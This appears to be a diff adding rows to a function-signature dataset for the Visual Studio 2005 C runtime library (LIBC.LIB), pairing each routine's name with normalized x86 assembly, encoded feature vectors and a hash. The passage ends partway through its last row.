+__adj_fdivr_m32,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",JKWmE7V7N46SRPK3kkTyt0XphO7GZNb/xmTW/wAAAAAAAAAAtXs3jgAAAAAAAAAARemE7gAAAAAAAAAA,[],0284ed2067cdf2f6c422ba44f554dbd4182e3102,VS2005,LIBC.LIB
+__adj_fdiv_m16i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD WORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",oB/xTwAAAAAAAAAAGZUUxKAf8U83xU33N8VN9wAAAAAAAAAA,[],2383ee5becf8fd9bfd13a05a0773cf13246226e7,VS2005,LIBC.LIB
+__fdivrp_sti_st,"SUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nCALL CONST\nADD ESP,CONST\nRETN",8vqvVwAAAAAAAAAA,hQAJZQAAAAAAAAAA,bcf78a913cec15878d418160332e696e95d942ac,VS2005,LIBC.LIB
+__adj_fptan,FPTAN\nRETN,7ncY0wAAAAAAAAAA,[],87a3d27ce74c44e7b71de1dbe1de6b8162c2cea2,VS2005,LIBC.LIB
+__safe_fdiv,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFSTP TBYTE PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP R32\nRETN",9GrEbwAAAAAAAAAA,A5DZIQAAAAAAAAAA,978ea2d4134adc9320dff2e3c5fd5920abd4de9d,VS2005,LIBC.LIB
+__fdivp_sti_st,"SUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFSTP TBYTE PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",WkHUhAAAAAAAAAAA,AaF1swAAAAAAAAAA,fcaebdee8b3fc941b578b1c85e2a60ce3da4f2b4,VS2005,LIBC.LIB
+__adj_fdivr_m32i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",w9mv3AAAAAAAAAAAGZUUxMPZr9zKmDbXypg21wAAAAAAAAAA,[],8fcb111be266b02f652d4a3d4bb3f3d59a154c3f,VS2005,LIBC.LIB
+__adj_fdiv_r,"SUB ESP,CONST\nAND R32,CONST\nJMP DWORD PTR DS:[R32*4]",waAQGAAAAAAAAAAA,[],296f1d570bac1c16711234f0cb0864f2b91a4a73,VS2005,LIBC.LIB
+__adj_fdivr_m64,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",/bEKmAAAAAAAAAAA0qDoYwAAAAAAAAAA7IYqTAAAAAAAAAAAJKWmE9Kg6GOSRPK3kkTyt+yGKkz9sQqY,[],e0502b6fdbc0a75f762aee17ee2f3c303db92d17,VS2005,LIBC.LIB
+__adj_fdiv_m32,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",tXs3jgAAAAAAAAAARemE7gAAAAAAAAAAJKWmE7V7N46SRPK3kkTyt0XphO7GZNb/xmTW/wAAAAAAAAAA,[],7edd38eb83e9f2d02e043b4a867a90c6686be72e,VS2005,LIBC.LIB
+__adj_fdivr_m16i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD WORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",N8VN9wAAAAAAAAAAoB/xTwAAAAAAAAAAGZUUxKAf8U83xU33,[],b43f0721851095088408e5d45b870f4362f7e4e4,VS2005,LIBC.LIB
+__adj_fprem1,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nMOV R32,0\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,CONST\nJCC CONST",R0GcOo1wE7+qAc7qhL8fjC/4PPIAAAAAjXATvy88BcwHmxoxAlPhzy/4PPIAAAAALzwFzAAAAAAAAAAAB5saMYS/H4wCU+HPqgHO6gAAAAAAAAAAL/g88gAAAAAAAAAA,[],c33f7a3587b02cd3e8f01e7a3a774daa049e0399,VS2005,LIBC.LIB
+_fdiv_main_routine,"FSTCW WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOR R32,CONST\nAND R32,CONST\nMOV DWORD PTR SS:[ESP+CONST],R32\nFLDCW WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST",6FWr2mvrAZQWOAgiBy7L14yFmb3udxjT6FWr2u53GNNTGwEyFjgIImvrAZReo4MnjIWZve53GNPoVavaRQxlQeNzXxoAAAAA7ncY0wAAAAAAAAAAFjgIImvrAZSv+aGe7ncY0wAAAAAAAAAATzMcbYyFmb3udxjTXqODJ6/5oZ4AAAAAjIWZve53GNPZOsPJ43NfGgcuy9cuYiWV39UPVQAAAAAAAAAAUxsBMt/VD1Xf1Q9V39UPVQAAAAAAAAAA7ncY0wAAAAAAAAAAa+sBlAAAAAAAAAAA2TrDyRY4CCLoVavar/mhnuNzXxoAAAAALmIllU8zHG3udxjT,[],c5772be54341161c9b879edaf197ba76920765c4,VS2005,LIBC.LIB
+__adj_fpatan,FPATAN\nRETN,7ncY0wAAAAAAAAAA,[],8892522858cd6654f9cda3054c9ee5b999bf5dc2,VS2005,LIBC.LIB
+__fprem_common,"MOV R32,DWORD PTR SS:[ESP+CONST]\nFXCH ST(1)\nFSTP ST\nFLD TBYTE PTR SS:[ESP+CONST]\nFXCH ST(1)\nAND R32,CONST\nSUB ESP,CONST\nFSTENV (28-BYTE) PTR SS:[ESP]",+yYwEVbQmrEVYKMJ43NfGhtA6pT8RE8YWNooOiccEz/zilJEFWCjCVjaKDqxde5H/ERPGFjaKDoJDxggJxwTP/smMBEX8myeXZ2BKBtA6pQ9cTVJOVp8YAAAAAAAAAAACQ8YIBtA6pTxzhSFsXXuR1jaKDoAAAAAPXE1SRtA6pSD6oDoG0DqlFjaKDoAAAAAWNooOjlafGBrtL2n8c4UhQkPGCAAAAAAg+qA6BtA6pR5zs6Fa7S9p6YOkpVxPrEVcT6xFaYOkpUAAAAAec7OhRtA6pQdHvzi84pSRCccEz8AAAAAHR784htA6pTjc18aVtCasfsmMBEX8myepg6SlTlafGAAAAAA43NfGhtA6pTjc18aF/JsnlbQmrEVYKMJ,[],a6fef8b3b09871b9901ba764a885fb348672efd3,VS2005,LIBC.LIB
+__adj_fdiv_m64,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",7IYqTAAAAAAAAAAAJKWmE9Kg6GOSRPK3kkTyt+yGKkz9sQqY/bEKmAAAAAAAAAAA0qDoYwAAAAAAAAAA,[],6af9ea97d0d78ddd1455033b74d56e5c1e56545c,VS2005,LIBC.LIB
+__fprem1_common,"MOV R32,DWORD PTR SS:[ESP+CONST]\nFXCH ST(1)\nFSTP ST\nFLD TBYTE PTR SS:[ESP+CONST]\nFXCH ST(1)\nAND R32,CONST\nSUB ESP,CONST\nFSTENV (28-BYTE) PTR SS:[ESP]",JxwTP/smMBGXqcpKXZ2BKBtA6pQ9cTVJOVp8YAAAAAAAAAAACQ8YIBtA6pTxzhSFsXXuR1jaKDoAAAAAPXE1SRtA6pSD6oDoG0DqlFjaKDoAAAAAWNooOjlafGBrtL2n8c4UhQkPGCAAAAAAg+qA6BtA6pR5zs6Fa7S9p9QEd9ZxPrEVcT6xFdQEd9YAAAAAec7OhRtA6pQdHvziHR784htA6pTjc18aVtCasfsmMBGXqcpK1AR31gAAAAAAAAAA43NfGhtA6pTjc18al6nKSvsmMBEAAAAA+yYwEVbQmrEVYKMJ43NfGhtA6pT8RE8YWNooOiccEz/zilJE/ERPGFjaKDoJDxggFWCjCVjaKDqxde5H84pSRCccEz8AAAAA,[],872d331212de7cd041b02819b480965d1dab8179,VS2005,LIBC.LIB
+__safe_fprem,CALL CONST\nRETN,aNbbxwAAAAAAAAAA,L/g88gAAAAAAAAAAAlPhzy/4PPIAAAAAlBPDdi88BcwHmxoxLzwFzAAAAAAAAAAAB5saMYS/H4wCU+HPhL8fjC/4PPIAAAAA,ad323e45dce4d3705570da26d82831b0f2cb5456,VS2005,LIBC.LIB
+__memicmp,"NEG R32\nMOV R32,R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",6FWr2sTZicD8fhA2NdW5mucw7/EGdpfc/H4QNgAAAAAAAAAAxNmJwAAAAAAAAAAABnaX3Jfae5TYzQSmfKNnppfae5TYzQSm2M0EptjNBKbYzQSm2M0EptjNBKZ/15Gof9eRqNjNBKbYzQSm2M0EptjNBKbYzQSm2M0EptjNBKZ/15Gof9eRqOhVq9qX2nuU2M0EpuhVq9qX2nuUl9p7lHyjZ6Zeo4MnXqODJ8TZicAAAAAA6FWr2sTZicANzMABDczAAcTZicAAAAAA5zDv8Zfae5Q4uSkrfKNnppfae5Q4uSkrOLkpK+hVq9qX2nuUFp+5AMTZicA11bmal9p7lHyjZ6Zeo4MnXqODJ8TZicAAAAAA,[],4f9259150351187738c0450c9df9ad1559bf5818,VS2005,LIBC.LIB
+__wspawnlp,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",bvadnQAAAAAAAAAA,HYNmwQAAAAAAAAAA,1509d67c3643413fbcd68f9b967e0e68625d6714,VS2005,LIBC.LIB
+__wtempnam,"PUSH R32\nCALL CONST\nPOP R32\nLEA R32,DWORD PTR DS:[R32+R32*2]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",uyGU9pmHdlT0xQN8nvidvQ2mmxQAAAAA9MUDfEoJdMcNDA4gsxKbiy5Vuf5ZFC89SAj4OQAAAAAAAAAADaabFAAAAAAAAAAAuyGU9hIGpRB1JSrKdSUqykgI+DnKakCeWRQvPbshlPYlSLdUoDc6obshlPYAAAAAEgalEEgI+DnKakCeDQwOIK/HHccAAAAASgl0x574nb0c/cgzWRQvPbshlPYKX6KQr8cdx574nb0c/cgzJUi3VLshlPYYtVGnympAng2mmxSt/yDOCl+ikC5Vuf5ZFC89cug6RZ74nb0c/cgzWRQvPS5Vuf6gNzqhrf8gzrshlPbqMoS4GLVRpxIGpRB1JSrKLlW5/iVIt1RZFC89HP3IM6/jrf8kA8OdJAPDnQ2mmxSv463/6jKEuLshlPZvJp7Nr+Ot/3LoOkUAAAAAbyaezZmHdlT0xQN8mYd2VEoJdMcNDA4g,[],60745fa3b45feeef6340e39f8d26e508e5578de9,VS2005,LIBC.LIB
+__lrotl,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAA,IgsILpfae5SymcisWyXZigGhdbP3Zl4vspnIrJfae5QAAAAAl9p7lCILCC4BoXWzAaF1swAAAAAAAAAA92ZeLyILCC4AAAAA,0151607032ce108db2b2cd2e24de6db320bf2044,VS2005,LIBC.LIB
+__rotl,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nMOV R32,R32\nDEC R32\nTEST R32,R32\nJCC CONST",92ZeLyILCC4AAAAAIgsILpfae5SymcisWyXZigGhdbP3Zl4vspnIrJfae5QAAAAAl9p7lCILCC4BoXWzAaF1swAAAAAAAAAA,[],bab5a62a428f28e326c78bd8657f78a191947f6c,VS2005,LIBC.LIB
+?set_unexpected@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+?__set_inconsistency@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+?set_terminate@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+?_set_se_translator@@YAP6AXIPAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+__wmakepath,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nTEST R32,R32\nPOP R32\nJCC CONST",6jKEuC5Vuf7IgvoayIL6Gi5Vuf4AAAAALlW5/i5Vuf4bLlt/Gy5bfy5Vuf78Zt7h/Gbe4RsuW38AAAAALlW5/h2cRa4bLlt/Gy5bfyve5k3qMoS4YSQ4U0GNfBsbLlt/6jKEuCve5k3IgvoayIL6Give5k0AAAAAGy5bf0GNfBu+SW47K97mTYz41XgAAAAAvkluOy5Vuf4AAAAAjPjVeD/DesVEp/5FRKf+RYz41XgAAAAAQY18Gy5Vuf4bLlt/LlW5/i5Vuf4bLlt/HZxFrj/DesUAAAAAGy5bfy5Vuf6HdUMkP8N6xQAAAAAAAAAAh3VDJId1QyQWs3TCFrN0wi5Vuf7qMoS4,[],4d4091044473fa555de0b5fd6b49d044d0c6fb7a,VS2005,LIBC.LIB
+_strftime,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",CrKkrAAAAAAAAAAA,nIZROC+BWQZXtwOPPHutnWN2YvTYzQSm91t2VuhOpzjmG2yxV7cDj5yGUTgAAAAAj+LO/WN2YvTYzQSm2M0EpuelZYECMQLBJu7hZT/DesUAAAAA5htssehOpzgAAAAAP8N6xQAAAAAAAAAAAjECwS+BWQachlE4L4FZBpyGUTgAAAAA6E6nOCbu4WU8e62dY3Zi9Cbu4WWG910g5p+Y8o/izv1jdmL0DQm/bo/izv1jdmL056VlgeafmPINCb9unIZROI/izv1jdmL0hvddID/DesUAAAAA,36d4f432ebc18d052a3e2abf37bc1745d85fe955,VS2005,LIBC.LIB
+__Gettnames,"PUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nPUSH DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nCALL CONST\nPUSH DWORD PTR DS:[R32+CONST]\nADD R32,R32\nLEA R32,DWORD PTR DS:[R32+R32+CONST]",gYWmNwAAAAAAAAAAiteCTYrXgk3sThnJ2wTCcorXgk3sThnJDq/MAg6vzALguO/R7E4ZyQAAAAAAAAAAIMoRVyDKEVd+TeF84Ljv0dsEwnIAAAAAIMoRVyDKEVe9aDoJfk3hfIGFpjfmxip/bd5yGiDKEVe9aDoJ5sYqfw6vzALguO/RvWg6CSDKEVd+TeF8,[],c38974973c23f07dadcfb94403ad297e05a300d3,VS2005,LIBC.LIB
+__Getdays,"INC R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",0sx14QAAAAAAAAAAc6IZYQAAAAAAAAAAgApzbbz7LHgAAAAAvPsseLz7LHjSzHXh1guK0dYLitGXTG/ll0xv5XOiGWGACnNtljHDQNYLitGXTG/l,[],3e99de75161dfa0ef8ab41b5dfa8660071e35cda,VS2005,LIBC.LIB
+__Getmonths,"INC R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",e4Gz9XuBs/XSzHXh6SEim+khIpuXTG/l9/NhEOkhIpuXTG/ll0xv5XOiGWH9EO3f0sx14QAAAAAAAAAAc6IZYQAAAAAAAAAA/RDt33uBs/UAAAAA,[],7cef4b2f9f2fb4da8b6cec885c10cd8ed5a7f50c,VS2005,LIBC.LIB
+__Strftime,"MOV DWORD PTR DS:[0],CONST\nINC R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R8,BYTE PTR DS:[R32]",91t2VuhOpzicrajLj+LO/WN2YvTYzQSmnK2oyybu4WUiIdMwzCadvpyGUTgAAAAA2M0EpuelZYECMQLBJu7hZT/DesUAAAAAL4FZBpyGUTgAAAAAP8N6xQAAAAAAAAAAAjECwS+BWQachlE4nIZROI/izv1jdmL06E6nOCbu4WUiIdMwjSRCQS+BWQYAAAAAY3Zi9Cbu4WWG910gUa5/dJyGUTgAAAAA56VlgVGuf3TMJp2+hvddID/DesUAAAAAnIZROC+BWQaNJEJBIiHTMI/izv0AAAAA,[],d5300ac61e3c12144c53b52613c0a6ab584a87bd,VS2005,LIBC.LIB
+__allshr,"MOV R32,R32\nSAR R32,CONST\nAND R8,CONST\nSAR R32,R8\nRETN",W9AV4EFrIHlb0BXgjZfqvwAAAAAAAAAAQWsgeQAAAAAAAAAAW9AV4O++qQuNl+q/776pCwAAAAAAAAAA,[],ac47381379ffe99b098c5e9d0b978b6f2f1aa74a,VS2005,LIBC.LIB
+_memcpy,"SHR CONST,CONST\nAND CONST2,CONST\nCMP R32,CONST\nJCC CONST",huPK6Eg0I7sI/nZxrLCxdVjaKDqHo219G1tgnQAAAAAAAAAASDQjuwAAAAAAAAAADrNBdwAAAAAAAAAASDQjuwAAAAAAAAAALxo03Eg0I7uvEG0QCP52cQAAAAAAAAAAhuPK6Eg0I7sI/nZxI5bZGobjyugvGjTcLxo03BtbYJ0Os0F3CP52cQAAAAAAAAAArxBtEAAAAAAAAAAASDQjuwAAAAAAAAAAh6NtfSOW2RpY2ig6WNooOobjyugvGjTc,[],0c78b090c42b41060d0e37019302528728b730bd,VS2005,LIBC.LIB
+__mbsrev,"MOVZX R32,R8\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R8,CONST\nINC R32\nTEST R8,R8\nJCC CONST",B7Yzpibu4WWuafZGPWQhaD/DesUAAAAArmn2Rge2M6YAAAAAj+LO/Qe2M6akr3fYJu7hZT/DesUAAAAAP8N6xQAAAAAAAAAApK932I/izv0AAAAAj+LO/Qe2M6YoWJyLU0MPuY/izv09ZCFoKFici4/izv2P4s79,[],65b315bc93a73af38fc2aec0c8f8ed89c80317c7,VS2005,LIBC.LIB
+_wcsrchr,"MOV R16,WORD PTR DS:[R32]\nSUB R16,R16\nPOP R32\nNEG R16\nSBB R32,R32\nNOT R32\nAND R32,R32\nRETN",OfG2ODBJwhdSv4ecKDll2xpCU6IAAAAAUr+HnDBJwhfkUryf5FK8n1K/h5wwScIXGkJTojnxtjjMykw4MEnCFwAAAAAAAAAAzMpMOBpCU6IAAAAA,[],6f6ec0d68240318fce002e7b66da67381779fc9f,VS2005,LIBC.LIB
+__wexecle,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",I+RHO6Foj01748YLe+PGC3vjxguhaI9NoWiPTQAAAAAAAAAA,[],75f8a7a63e66d35b0d7e31175aebe85a7cd9df8a,VS2005,LIBC.LIB
+__wcslwr,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",AOHWawAAAAAAAAAAgXLrz1HVvV4GgcpPAOHWawAAAAAAAAAABoHKT1HVvV70VUzS7ryWW76SefjqMoS4+SqyQoFy68+cxvMD7zeiiVHVvV4AAAAA6jKEuL6Sefim2AprptgKa76SefgAAAAA9FVM0lHVvV7vN6KJvpJ5+O68llsA4dZrUdW9XgDh1msAAAAAnMbzAwDh1mvuvJZb,[],ae2ed82867415c58d00117b4494958b3d70d6560,VS2005,LIBC.LIB
+___onexitinit,"PUSH CONST\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nPOP R32\nAND DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",JVCfnAAAAAAAAAAAB1vcldyII8ElUJ+c3IgjwQAAAAAAAAAA,[],1867e7447a590f6abdbdc7565a8c8ed48f44afe6,VS2005,LIBC.LIB
+__onexit,"PUSH R32\nPUSH DWORD PTR DS:[0]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nPOP R32\nMOV R32,DWORD PTR DS:[0]\nMOV R32,R32\nSUB R32,R32",PQjHsgAAAAAAAAAAHDXR5T0Ix7IBoXWzzdISxAAAAAAAAAAAxZtwxs3SEsQcNdHlAaF1swAAAAAAAAAA,[],6a0abbb0f5cbb2fcb3c6c61a99295b39423c5423,VS2005,LIBC.LIB
+_atexit,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nNEG R32\nSBB R32,R32\nPOP R32\nNEG R32\nDEC R32\nRETN",/nlpGwAAAAAAAAAA,zdISxAAAAAAAAAAAxZtwxs3SEsQcNdHlAaF1swAAAAAAAAAAPQjHsgAAAAAAAAAAHDXR5T0Ix7IBoXWz,815f8a93681bf31e8a9133aec34d57f8ff2dce56,VS2005,LIBC.LIB
+__wtmpnam,"PUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",NXgBMpEwzxiIXCPrDczAAdV/HhwAAAAAe+shaohcI+vOQ0b97zeiidV/HhwAAAAAiFwj6zV4ATJPi8wK1X8eHAAAAAAAAAAAzkNG/TV4ATIAAAAAT4vMCgAAAAAAAAAAkTDPGO83ookNzMAB,[],0e71ad0ae5438bea717bbf7ce83fcfffa53fc89a,VS2005,LIBC.LIB
+_vwprintf,"PUSH R32\nPUSH R32\nMOV R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nMOV R32,R32",YzuaxwAAAAAAAAAA,Xk6AaG1kpmL2nGVU+y3xuG1kpmJeToBoDczAASh59rYAAAAARyjsnAAAAAAAAAAAWNooOk+LzApYWXafR7G+cE+LzApY2ig6WFl2nyh59rYAAAAA9pxlVEco7JwAAAAAKHn2tk+LzAr7LfG4T4vMCgAAAAAAAAAAbWSmYkco7JwAAAAAWNooOljaKDoNzMAB,d92758663a55b0aecf6c1087d15f738cff1d6738,VS2005,LIBC.LIB
+_puts,"XOR R32,R32\nPUSH R32\nPUSH EBP\nCALL CONST\nPOP R32\nMOV R32,R32\nPOP R32\nPOP R32",mrh2pQu9UaQAAAAAxrL+GxRMis5b11Z2laH/Tgu9UaQAAAAAW9dWdpWh/06auHalC71RpAAAAAAAAAAAFEyKzgAAAAAAAAAA,[],c17fa7dfc8fdc6f4eab096311565bd983140a2dd,VS2005,LIBC.LIB
+__87except,"POP R32\nLEA R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32",l9p7lNZ87gyX2nuUys3lZo37lbckA8Odl9p7lNZ87gyX2nuUl9p7lNZ87gyX2nuUl9p7lAf9iUHihHJ34oRydy1GnW+X2nuUl9p7lMrN5WbWfO4M1nzuDLuTSRQAAAAAJAPDnY37lbeIXCPrLUadb8rN5WYAAAAAiFwj60L41taN+5W31nzuDLuTSRQAAAAA1nzuDLuTSRQAAAAA1nzuDLuTSRQAAAAAjfuVt0L41tYAAAAAB/2JQbuTSRQAAAAAu5NJFMrN5WbnC9+XQvjW1gAAAAAAAAAA5wvfl1qMSU+7tlwsu7ZcLFqMSU+7tlwsu7ZcLFqMSU/joqt846KrfDeAWXgAAAAAWoxJTzeAWXgAAAAAhbzRBAf9iUGX2nuUN4BZeMrN5WYAAAAA,[],1562675dd6307c66fe08163ee17c7c19620aefed,VS2005,LIBC.LIB
+__AdjustStack,"MOV R32,DWORD PTR DS:[R32+CONST]\nPUSH CONST\nMOV R32,R32\nADD R32,CONST\nAND R16,CONST\nDEC R32\nXOR R32,R32\nAND R32,CONST",OVp8YAAAAAAAAAAAIYd5YwDh1mt3DS6ndw0upwDh1msAAAAAO6B7pjuge6Y5WnxgAOHWawAAAAAAAAAAsCT8gzuge6YAAAAA3zKwqyGHeWOwJPyD,[],74877900e3de44ff91846d849370718d60641ca0,VS2005,LIBC.LIB
+__FillOperand,"AND R8,CONST\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nOR R8,CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",yq8XaC6JAm4AAAAAdZUyci6JAm4AAAAA1MwuW3WVMnKHo219u7ZcLFAGA1+X2nuUucrwe0XfepCX2nuUl9p7lEvTtWmX2nuUl9p7lADza+yX2nuUl9p7lB50T9e7tlwsTv0LFOAd3KhO/QsUu7ZcLC6JAm7MkPz8zJD8/C6JAm4AAAAATv0LFMyQ/Py7tlwsHnRP18vkkS4AAAAAu7ZcLLnK8Hu7tlwsu7ZcLMqvF2i7tlwsy+SRLi6JAm4AAAAAl9p7lEbzbFvoVavau7ZcLIG+Ux9O/QsU6FWr2suCy5VG82xbAPNr7L87qgQAAAAATv0LFC6JAm56rYGih6NtfS6JAm5O/QsUS9O1ab87qgQAAAAAvzuqBMvkkS4AAAAAeq2Boi6JAm4AAAAAy4LLlS6JAm4AAAAARvNsWy6JAm4AAAAAUAYDXy6JAm4AAAAARvNsWy6JAm4AAAAARd96kC6JAm4AAAAALokCbgAAAAAAAAAAgb5THy6JAm4AAAAA4B3cqMvkkS4AAAAA+gFslbu2XCzUzC5b,[],82e8eb7a7797e0284a3ca832f58cc29cc7bb3c8b,VS2005,LIBC.LIB
+__GetFpRegVal,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHR R32,CONST\nAND R32,CONST\nADD R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",7ahznmKUWq8AAAAAYpRarwAAAAAAAAAAu7ZcLCqzQt7tqHOeKrNC3mKUWq8AAAAAbIsFKiqzQt67tlws,[],3082fa654af7bd504ff1f0c4fde5f539a9de5c24,VS2005,LIBC.LIB
+__fpieee_flt,"FCLEX\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nPOP R32\nCMP R32,-1\nJCC CONST",6FWr2iMeC7voVavaDczAAcf0Qi0AAAAA6FWr2iMeC7voVavaJu7hZcf0Qi0AAAAAx/RCLXj/KU+Vjvx6dKxcb06T5ZkAAAAA6FWr2mZ5MTUjHgu7Ix4Lu++YjSOvqet7zArkCB2KnlIHmwYdlY78euzvsBcAAAAAr6nre06gi7Eznn5ieP8pT+zvsBcAAAAAM55+Yk6gi7EAAAAA7M0e/HSsXG8AAAAALxo03Ki7tTeX2nuU7O+wFygoOsksVagPZnkxNU6gi7EAAAAAxJKmaFNNgfMAAAAALFWoD+zvsBcAAAAAHrzlGLKZyKxY2ig6B5sGHU79CxQAAAAAKCg6yezvsBcAAAAA7O+wFygoOsnXN7CE7TIVih0qflkAAAAAQUXQG079CxQAAAAA1zewhAISbEcAAAAATv0LFB2KnlJOk+WZKCg6yQISbEcAAAAATpPlmai7tTeX2nuUCi0LzB9kPF5yiY6kAhJsR8wK5AgdHvzil9p7lFcHs0qX2nuUl9p7lFcHs0qX2nuUHR784h9kPF4dHvzil9p7lC8aNNwk9O+kJPTvpC8aNNwAAAAAJw91Eibu4WUNzMABVwezSi8aNNwAAAAAHR784swK5AjoVavaVwezSi8aNNwAAAAA6FWr2gotC8wdHvziqLu1Ny8aNNwAAAAAHR784kFF0BsKLQvMl9p7lFcHs0qX2nuUWNooOgDza+xY2ig6l9p7lGHqmGkk9O+kJPTvpGHqmGkAAAAAWNooOgDza+xy6DpFVwezSmHqmGkAAAAAcug6RdsHce+n6f7iqLu1N2HqmGkAAAAAcomOpO0yFYoSsxlOYeqYaSSjmVzEkqZoAPNr7Chdv6sAAAAAxJKmaNjNBKYAAAAAAPNr7Chdv6sAAAAAJKOZXNjNBKYAAAAA2M0EpiSjmV